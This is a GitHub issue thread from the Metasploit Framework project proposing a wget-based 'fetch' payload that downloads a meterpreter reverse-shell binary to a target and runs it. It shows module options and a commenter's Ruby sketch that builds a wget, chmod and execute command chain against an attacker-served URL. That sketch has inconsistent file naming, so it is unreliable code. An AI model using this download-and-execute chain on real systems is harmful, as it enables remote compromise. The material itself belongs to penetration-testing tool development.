metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Wget Fetch-based command payload

Open bwatters-r7 opened this issue 2 years ago • 3 comments

Use the groundwork from the adapter payloads to create a new type of payload that uses wget to pull a payload down and execute it. Fundamentally, this would be the same as single-command command stagers, but significantly simpler to implement and far more portable. This (in theory) will be the first "Fetch-Based" payload implemented, with more to follow.

General usage mock-up:

msf6 exploit(linux/http/glpi_htmlawed_php_injection) > use payload/cmd/linux/x64/wget/meterpreter/reverse_tcp 
msf6 payload(cmd/linux/x64/wget/meterpreter/reverse_tcp) > show options

Module options (payload/cmd/linux/x64/wget/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_DELETE        true             yes       Attempt to delete payload after execution
   FETCH_FILENAME      nRqYjpTCY        no        Name to use on remote system when storing payload
   FETCH_SRVHOST       0.0.0.0          yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URI           ZAhCbCtg         no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port
   WGET_CHECK_CERT     false            yes       Do not check the server certificate
   WGET_PROTOCOL       HTTP             yes       Protocol to use for fetch command (Accepted: HTTP, HTTPS)
   WGET_SILENT         true             yes       Set silent flag in wget command


View the full module info with the info, or info -d command.

msf6 payload(cmd/linux/x64/wget/meterpreter/reverse_tcp) >

bwatters-r7 avatar Mar 09 '23 13:03 bwatters-r7

To create a new type of payload that uses wget to pull a payload down and execute it, you can use the groundwork from the adapter payloads. Here's an example of how you could create a fetch-based command payload using wget:

Start by creating a new file in the "payloads/cmd" directory with a descriptive name, such as "linux_x64_wget_meterpreter_reverse_tcp.rb".

In the new file, define your payload class and inherit from the "Msf::Payload::Single" class. For example:

arduino Copy code class MetasploitModule < Msf::Payload::Single ... end Define any required options for your payload using the "register_options" method. These options will be used to configure the wget command that fetches the payload. For example:
register_options( [ OptString.new('FETCH_SRVHOST', [true, 'Local IP to use for serving payload', '0.0.0.0']), OptInt.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]), OptString.new('FETCH_WRITABLE_DIR', [true, 'Remote writable dir to store payload', '/tmp']), OptString.new('FETCH_FILENAME', [false, 'Name to use on remote system when storing payload', nil]), OptString.new('FETCH_URI', [false, 'Local URI to use for serving payload', nil]), OptBool.new('FETCH_DELETE', [true, 'Attempt to delete payload after execution', true]), OptBool.new('WGET_CHECK_CERT', [true, 'Do not check the server certificate', false]), OptEnum.new('WGET_PROTOCOL', [true, 'Protocol to use for fetch command', 'HTTP', ['HTTP', 'HTTPS']]), OptBool.new('WGET_SILENT', [true, 'Set silent flag in wget command', true]), ] )

Implement the "generate" method to generate the payload. In this method, you'll use the "wget" command to fetch the payload from the specified server and store it in a writable directory on the target system. You can use the "datastore" method to access the values of the options you defined in step 3. Here's an example implementation:

def generate cmd = "wget -O #{datastore['FETCH_WRITABLE_DIR']}/#{datastore['FETCH_FILENAME'] || rand_text_alpha(8)}.bin" cmd << " --no-check-certificate" if datastore['WGET_CHECK_CERT'] cmd << " --quiet" if datastore['WGET_SILENT'] cmd << " #{datastore['WGET_PROTOCOL'].downcase}://#{datastore['FETCH_SRVHOST']}:#{datastore['FETCH_SRVPORT']}/#{datastore['FETCH_URI']}" cmd << " && chmod +x #{datastore['FETCH_WRITABLE_DIR']}/#{datastore['FETCH_FILENAME']}" cmd << " && #{datastore['FETCH_WRITABLE_DIR']}/#{datastore['FETCH_FILENAME']}" cmd << " && rm -f #{datastore['FETCH_WRITABLE_DIR']}/#{datastore['FETCH_FILENAME']}" if datastore['FETCH_DELETE']

payload = Rex::Text.to_hex(cmd)

return payload end

This implementation generates a command that uses wget to fetch the payload from the specified server and store it in the remote writable directory. It then sets the execute permission on the file and executes it. Finally, it deletes the file if the "FETCH_DELETE" option is set.

Save the file and reload Metasploit to make your new payload available. You can now use your new fetch-based

saurabhmj11 avatar Apr 07 '23 05:04 saurabhmj11

Please see https://github.com/rapid7/metasploit-framework/pull/17782

bwatters-r7 avatar Apr 07 '23 14:04 bwatters-r7

Image

How i can fix it

RahulTarafder avatar Mar 20 '24 06:03 RahulTarafder

completed in https://github.com/rapid7/metasploit-framework/pull/17782

bwatters-r7 avatar Apr 03 '25 13:04 bwatters-r7